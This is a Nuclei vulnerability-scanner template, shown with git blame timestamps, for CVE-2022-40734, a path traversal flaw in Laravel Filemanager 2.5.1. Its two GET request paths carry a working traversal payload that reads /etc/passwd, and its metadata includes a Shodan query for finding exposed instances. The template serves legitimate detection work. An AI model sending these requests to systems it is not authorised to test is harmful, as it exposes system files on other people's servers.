nuclei-templates/http/cves/2022/CVE-2022-40734.yaml

36 lines
1.2 KiB
YAML
Raw Normal View History

2022-09-15 08:44:40 +00:00
id: CVE-2022-40734
info:
name: Laravel Filemanager v2.5.1 - Local File Inclusion
2022-09-15 08:44:40 +00:00
author: arafatansari
severity: medium
2022-09-15 08:53:15 +00:00
description: |
Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.
2022-09-15 08:44:40 +00:00
reference:
- https://github.com/UniSharp/laravel-filemanager/issues/1150
2022-09-15 08:54:40 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-40734
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
2022-09-15 08:54:40 +00:00
cve-id: CVE-2022-40734
cwe-id: CWE-22
cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*
epss-score: 0.01707
2022-09-15 08:53:15 +00:00
metadata:
max-request: 2
2022-09-15 08:54:40 +00:00
shodan-query: http.html:"Laravel Filemanager"
2023-06-04 08:13:42 +00:00
verified: true
2022-09-15 08:54:40 +00:00
tags: cve,cve2022,laravel,unisharp,lfi,traversal
2022-09-15 08:44:40 +00:00
http:
2022-09-15 08:44:40 +00:00
- method: GET
path:
- "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
- "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
2022-09-15 08:54:40 +00:00
stop-at-first-match: true
2022-09-15 08:44:40 +00:00
matchers:
- type: regex
regex:
- "root:[x*]:0:0"